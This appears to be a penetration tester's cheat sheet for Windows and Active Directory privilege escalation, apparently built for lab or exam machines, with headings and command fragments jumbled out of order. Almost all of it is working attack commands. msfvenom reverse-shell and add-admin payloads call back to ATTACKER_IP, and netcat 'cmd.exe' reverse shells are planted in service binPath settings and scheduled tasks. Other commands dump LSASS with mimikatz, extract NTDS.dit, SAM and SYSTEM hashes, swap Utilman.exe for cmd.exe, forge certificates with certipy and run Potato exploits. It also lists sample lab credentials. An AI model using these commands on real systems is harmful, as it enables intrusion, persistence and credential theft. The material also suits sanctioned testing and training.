Windows Privilege Escalation
Privesc Tips
svc restart
hijack
AD
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
write-UserAddMSI
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi
.\PrintSpoofer64.exe -i -c powershell.exe
.\PrintSpoofer64.exe -i -c C:\Users\Public\tmp\local_admin\weaken.bat

printnightmare

powerup

download (ntds.dit & SYSTEM) to attack box

impacket-secretsdump -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

next, save and export the SYSTEM reg. This is required to extract info with secretsdump

potato

runas /user:aslam cmd
xfreerdp /u:aslam /p:Password123! /v:$trgt1
.\GodPotato-NET4.exe -cmd "cmd /c C:\Users\Public\tmp\local_admin\weaken.bat"
.\GodPotato-NET4.exe -cmd "cmd /c whoami /all"
win-key+u

upload nc.exe

Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\root.txt root.txt

If the service is auto-start, and you don't have permission to restart the service

shutdown /r /t 0

or

sc.exe stop <service>
sc.exe start <service>
restart-service <service>
sc.exe config VSS binPath="C:\path\to\nc.exe -e cmd.exe <listen_ip> <port>"

set up listener

sc.exe config VGAuthService binPath="C:\path\to\nc.exe -e cmd.exe <listen_ip> <port>"
rdesktop -u "" -p "" $trgt1

open login window: try rdesktop

mv C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe

c:\path\to\SYSTEM
c:\path\to\SAM
c:\path\to\SECURITY

icacls 'C:\path\to\file' /grant <user>:F
icacls 'C:\path\to\file' /grant All:F

whoami /priv
.\Enable-Privilege.ps1
takeown /f 'C:\path\to\file'
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege Z:\Windows\ntds\ntds.dit .\ntds.dit
reg save HKLM\SYSTEM SYSTEM
mv C:\Windows\System32\utilman.exe C:\Windows\System32\Utilman.old

import-module .\Enable-Privilege.ps1

note: if SeTakeOwnershipPrivilege is present but not enabled

takeown /f 'C:\path\to\file'

download to attacker box

Get-SeBackupPrivilege
diskshadow /s C:\path\to\shadow_script.txt
robocopy /B F:\Windows\NTDS .\myFolder ntds.dit

SeBackupPrivilegeCmdLets.dll
SeBackupPrivilegeUtils.dll

unix2dos shadow_script.txt

dir C:\Users\Administrator

extract the hash: between : and :::

import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dll

SAM local creds

shadow copy

If you have an account that is a member of the Backup Operators group on a Domain Controller

reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

upld

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

cd C:\Windows\system32

FS navigation & read

SeBackupPrivilegeCmdLets.dll
SeBackupPrivilegeUtils.dll

import-module .\SeBackupPrivilegeCmdLets.dll
Get-SeBackupPrivilege
import-module .\SeBackupPrivilegeUtils.dll
Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit .\ntds.dit

runas, crackstation, hashcat, decode, crackmapexec, hydra, etc.

Installed Program

Certificate Service DCOM Access

AD Recycle Bin

Exclude MS default

schtasks /query /fo LIST /v | findstr /v "\Microsoft"
icacls C:\TASK_PATH\task.bat

Interesting files

exposed creds

reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
schtasks /query /fo LIST /v

if you have enough privs, restore obj

certipy-ad find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query "HKCU\Software\OpenSSH\Agent\Key"
for l in $(cat creds.txt); do u=$(echo $l | cut -d ':' -f1); p=$(echo $l | cut -d ':' -f2); echo -e "SEARCHING AS USER: $u\n" && certipy-ad find -u $u -p $p -target $trgt1 -text -stdout -vulnerable; done

multiple users (valid creds)

creds format:

user1:pass1
user2:pass2
Restore-ADObject -Identity '562f229c-e03a-4005-a098-10046e9b8942'
certipy-ad req -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication

Hunt for sensitive information, e.g. previously deleted user info

DN or GUID

certipy-ad auth -pfx administrator.pfx

Get-ADObject -filter { SAMAccountName -eq "<username>" } -includeDeletedObjects -property *

Review permissions:

  • enrollment
  • Object control

read deleted AD objects

Get-ChildItem -Path C:\ -Include *.kdbx,*.pdf,*.txt,*.doc,*.docx,*.xml -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\windows.old -Include *SAM,*SYSTEM,*SECURITY,*.kdbx,*doc,*xml,*config -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Include vnc.ini,ultravnc.ini,*vnc*,web.config,php.ini,httpd.conf,httpd-xampp.conf,*.ini,my.cnf,SiteList.xml,ConsoleHost_history.txt,*.gpg,*.pgp,*config*.php,elasticsearch.y*ml,kibana.y*ml,*.p12,*.der,*.csr,*.cer,known_hosts,id_rsa,id_dsa,*.ovpn,anaconda-ks.cfg,hostapd.conf,rsyncd.conf,cesi.conf,supervisord.conf,tomcat-users.xml,*.kdbx,KeePass.config,Ntds.dit,SAM,SYSTEM,FreeSSHDservice.ini,access.log,error.log,server.xml,ConsoleHost_history.txt,setupinfo,setupinfo.bak,key3.db,key4.db,places.sqlite,sav,*.doc -File -Recurse -ErrorAction SilentlyContinue
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
crackmapexec ldap  $trgt1 -u ryan.cooper -p NuclearMosquito3 -M adcs

identify vulnerable templates

certipy-ad req -u <username> -p <password> -target $trgt1 -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication
Contains:
RestorePriv
BackupPriv

groups

dir "C:\Program Files (x86)"
dir "C:\Program Files"

file analysis

Get-ChildItem -Path C:\Users\dave\ -Include *.log,*.db,*.gpg,*.pgp,*.xls,*.docx,*.pdf,*.txt,*.kdbx,KeePass.config,known_hosts,id_rsa*,id_dsa*,Ntds.dit,*.ovpn,*config*.php,access.log,error.log,server.xml,*vnc* -File -Recurse -ErrorAction SilentlyContinue

Non-standard programs installed

google: <prog> exploit
<prog> LPE exploit etc.

domain tgt

saved creds

reg

type C:\inetpub\wwwroot\web.config | findstr connectionString

win.old/backup FS

interesting files

hidden folders

"password" in file

look for filetypes

File system enum

dir C:\
tree C:\Users /f

Enumerate drives

users' home

Get-ChildItem -Recurse -ErrorAction SilentlyContinue -Include *.bak,*.ini | ForEach-Object { try { Select-String -Path $_.FullName -Pattern "password" -CaseSensitive:$false } catch {} }

modify extension & search str accordingly

cd C:\<path>
findstr /si password *.xml *.ini *.txt

powerup

Get-LocalUser

ps

Environment

Console history

saved creds

SeRestorePrivilege + RDP

local_user/SeTakeOwnershipPrivilege

Backup Operator

Server Operator

SeTakeOwnershipPrivilege

Running Services

Scheduled Tasks

rdp (via rdesktop)

SeImpersonatePrivilege

SeRestorePrivilege + RDP

Certificate Service DCOM Access

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

AlwaysInstallElevated

Backup Operators

SeDebugPrivilege

SeBackUpPrivilege

SeTakeOwnershipPrivilege

User Information

Server Operators

AD Recycle Bin

net localgroup Administrators

interesting grps

net users /domain
net localgroup
whoami

SeDebugPrivilege

dir /a
whoami /priv
whoami /groups
pypykatz lsa minidump lsass.DMP

shadow copy

or

procdump.exe -ma LSASS lsass.dmp

upld

mimikatz.exe
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

download to attack box

Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\root.txt root.txt
Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit .\ntds.dit

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

download to attacker box

import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dll
procdump.exe -accepteula -ma lsass.exe lsass.dmp
impacket-secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

extract the hash: between : and :::

cd E:

diskshadow /s shadow_script.txt
robocopy E:\Windows\ntds . ntds.dit
Set-SeBackupPrivilege
dir C:\Users\Administrator
Get-SeBackupPrivilege

start cmd.exe as admin

SeBackupPrivilege

SAM local creds

unix2dos shadow_script.txt

Google unfamiliar groups for privesc

net user <username>

Installed Applications

Patching info + kernel vuln

Installed Driver Versions

/local_user/SeBackupPrivilege

Privileges

Services & Network Information

net user 

Privesc Enum

systeminfo

System information

Auto enum

Running Processes

Manual enum

SeImpersonate

AlwaysInstallElevated

Things to look out for:

  1. Keep Kernel exploits in back pocket - they can be hit and miss. (Come back to these if there's no luck elsewhere)
  2. Cache logon count - (useful for AD sets) to move around after getting localadmin
  3. User's Powershell History
  4. LANMANCompatibility, the version used determines if you can pass your hash to authenticate, or if you have to crack the hash
  5. Local Users
  6. 'Ever Logged Users', this could potentially provide domain users who have logged on the current machine
  7. User home folders - if you gain localadmin, you can navigate any user's home folder
  8. Processes that are hijackable - look for other users' processes - non standard processes
  9. Services with writeable/createfile permissions, or unquoted services - non standard services
  10. Scheduled Tasks

Tip

It may not be a requirement to privesc as such on ms01 after initial access.

  • You can look for creds to do spraying
  • You can set up tunnelling and enumerate internal machines (ms02/dc01)
  • If you have a domain account, you can do domain enumeration etc.

Tip

  • If you can't get Admin access and you need the user's hash, you can try Net-NTLMv2 Responder attacks.
  • If you have code execution on a remote machine and want to capture the user's NTLM hash but don't have privileges to run mimikatz, you can attempt NTLM hash capture using Responder.

transfer payload->
backup and replace the original

grant full access to new payload

e.g. send mail to..

e.g. upload doc to..

hints

local_admin (folder): weaken.exe

Install-ServiceBinary -Name 'SERVICE_NAME'

NOTE: if the AbuseFunction throws an error, this doesn't necessarily mean an exploit doesn't exist. Always perform manual checks.

powerup

icacls <service_name>.exe /grant Everyone:F

schtasks /run /tn TASK_NAME

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe-service -o <service_name>.exe

nc -lvnp 4444

echo C:\Users\Public\tmp\local_admin\weaken.exe >> C:\task.ps1
echo nc64.exe -e cmd.exe ATTACKER_IP 4444 >  TASK_PATH\task.bat
nc -lvnp 4444
select load_file('C:\\test\\nc.exe') into dumpfile 'C:\\test\\shell.exe';

lsass.DMP

SYSTEM & NTDS.dit

exposed cached creds files

exposed creds

SAM & SYSTEM

svc interactions

MySQL

MSSQL

write perm
(WerTrigger exploit)

select load_file('C:\\test\\phoneinfo.dll') into dumpfile "C:\\Windows\\System32\\phoneinfo.dll";
.\WerTrigger.exe
.\nc.exe <attack_ip> <port> -c cmd.exe 

HTTP (internal website)

show databases;
use db;
select * from table;

xp_cmdshell whoami

mysql -u root -h 240.0.0.1
impacket-mssqlclient sql_svc:'Dolphin1'@10.10.165.148 -windows-auth

enable_xp_cmdshell

silver ticket, etc.

remote

Local port forward

./agent -connect <remote_ip>:11601 -retry -ignore-cert
sudo ip tuntap add user <username> mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 240.0.0.1/32 dev ligolo
./proxy -selfcert

on trgt

  • transfer the malicious DLL to the vulnerable search order location
  • backup and replace the original

nc -lvnp 4444
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck -Extended

grant full access to new payload

local_admin (folder): weaken.dll

msfvenom -p windows/x64/exec CMD="net user aslam_admin Password123! /add; net localgroup Administrators aslam_admin /add" -f dll -o <filename>.dll -a x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f exe > <filename>.exe

nc -lvnp 4444

local_admin (folder): weaken.exe

  • Rename the exploit and save it to the vulnerable location

icacls C:\MyPrograms\Disk.exe /grant Everyone:F

sc.exe stop <service>
sc.exe start <service>
restart-service <service>

or

If the service is auto-start, and you don't have permission to restart the service

shutdown /r /t 0
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic product get name,version,vendor | findstr /v "Microsoft Corporation"

NOTE: the service executable must attempt to load DLLs that show up as 'NAME NOT FOUND' (i.e. missing from the search path)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f dll > <filename>.dll
.\winPEASx64.exe
reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
  • Think about the processes that are running:
    • What is the integrity level of the process?
    • Who owns the process?
    • If you see a Web Server and SQL Server running:
      • Is there a 'web server solution' (e.g. XAMPP) that likely spawned both the web server and the SQL server?

Binary service hijack

get-process
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname 
driverquery /fo table /si
  • Are there any non-standard Windows Drivers?
wmic process get name,ProcessID
wmic process get ProcessID,ExecutablePath | findstr "proc_name"
Get-ScheduledTask | ft TaskName,TaskPath,State

Local service forwarding

unquoted service path

dll service hijack

Narrow

icacls C:\path
sc.exe qc SERVICE_NAME
schtasks /query /tn TASK_NAME /fo list /v

binary hijack

exposed creds

wmic service get name,displayname,pathname,startmode
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

narrow

Get-UnquotedService

narrow

invoke-allchecks

tasklist /svc
wmic service get name,pathname

script modification

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
wmic service list brief

note: over WinRM or a bind shell, Get-CimInstance and Get-Service may return a "permission denied" error when run from a non-administrative account

reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath | sls passw

PS

cmd

set
cat (Get-PSReadlineOption).HistorySavePath
dir env:

IIS config

PS history

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
ipconfig
netstat -ano
route print

std cmd

cmd

PS

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

PS transcript

cmdkey /list
klist
forfiles /S /M *.log /C "cmd /c findstr /I password @file"

non-default scripts executed as SYSTEM, e.g. an improper uninstall via a software manager such as SCCM

cmd colour
narrow
val: 0x1
gui access
adduser
revshell
revsh
e.g.
perm
vss
vgauth
shadow_script.txt
view all